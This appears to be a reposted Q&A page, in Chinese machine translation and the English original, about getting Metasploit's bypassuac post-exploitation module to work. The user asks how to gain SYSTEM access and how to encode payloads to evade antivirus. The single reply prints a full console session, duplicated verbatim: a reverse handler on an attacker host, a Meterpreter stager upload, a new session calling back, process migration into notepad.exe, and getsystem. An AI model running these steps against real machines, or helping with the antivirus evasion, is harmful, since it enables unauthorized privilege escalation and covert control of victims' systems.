当前位置: 文江博客话题详情

metasploit:bypassuac Windows 权限升级挂起

发布于 2025-01-03 23:18:20 字数 913 浏览 7 评论 0原文

post/windows/escalate/bypassuac 似乎对我来说失败了

出于某种原因,我无法让后利用模块bypassuac 工作。 这就是我所做的:

  1. 在目标计算机上打开一个 meterpreter 会话(作为 NETWORKSERVICE 用户)
  2. 将会话置于后台

  3. 尝试使用如下的后利用模块:

    使用 post/windows/escalate/bypassuac 设置会话 1 设置LHOST 192.168.1.100 设置 LPORT 4444 漏洞

  4. 该端口尚未使用,因此应该没问题。

  5. 输出如下:

    [-] 处理程序无法绑定到 192.168.1.100:4444 [] 在 0.0.0.0:4444 上启动反向处理程序 [] 启动有效负载处理程序... [] 正在将旁路 UAC 可执行文件上传到文件系统... [] Meterpreter stager 可执行文件 73802 字节长正在上传.. [] 已将代理上传到文件系统... []模块后执行完成

  6. 然后它返回到控制台并且什么都不做,没有新会话,什么也不做。

我检查了以下内容:

  1. 将可执行文件bypassuac-x86.exe手动上传到目标。效果非常好。
  2. 检查病毒扫描程序的警钟是否没有从可执行文件中响起。他们没有

有一种手动运行可执行文件的方法吗?有人可以向我解释一下如何使用系统级别访问权限打开一个新的 meterpreter 会话吗?

或者我可以以某种方式对有效负载进行编码并使用我的自定义模板来逃避所有防病毒可能性吗?我还没有找到任何对后利用模块进行编码的选项。

预先感

谢哈尔瓦尔

原文

post/windows/escalate/bypassuac seems to fail for me

For some reason I can't get the post exploitation module bypassuac to work.
This is what I did:

  1. Opened a meterpreter session on the target machine (as the NETWORKSERVICE user)
  2. Put the session in background

  3. Tried to use the post exploitation module like this:

    use post/windows/escalate/bypassuac
    set SESSION 1
    set LHOST 192.168.1.100
    set LPORT 4444 exploit

  4. The port is not used yet so should be fine.

  5. The output is as follows:

    [-] Handler failed to bind to 192.168.1.100:4444
    [] Started reverse handler on 0.0.0.0:4444
    [    ] Starting the payload handler...
    [] Uploading the bypass UAC executable to the filesystem...
    [    ] Meterpreter stager executable 73802 bytes long being uploaded..
    [] Uploaded the agent to the filesystem....
    [    ] Post module execution completed

  6. Then it returns to the console and does nothing, no new session, nothing whatsoever.

I checked the following things:

  1. Uploading the executable bypassuac-x86.exe manually to the target. That worked perfectly fine.
  2. Checked whether the virusscanner's alarm bells didn't ring from the executable. They didn't

Is there a way of manually running the executable and could someone explain me how that would work to open a new meterpreter session with SYSTEM level access?

Or can I somehow encode the payload and use my custom template to evade all antivirus possibilities? I haven't found any option to encode post-exploitation modules yet.

Thanks in advance

Halvar

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(1

风苍溪 2025-01-10 23:18:20
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo

msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo
回复 原文
~没有更多了~

关于作者

痞味浪人

暂无简介

文章
评论
27 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

眼泪淡了忧伤

文章 0 评论 0

corot39

文章 0 评论 0

守护在此方

文章 0 评论 0

github_3h15MP3i7

文章 0 评论 0

相思故

文章 0 评论 0

滥情空心

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文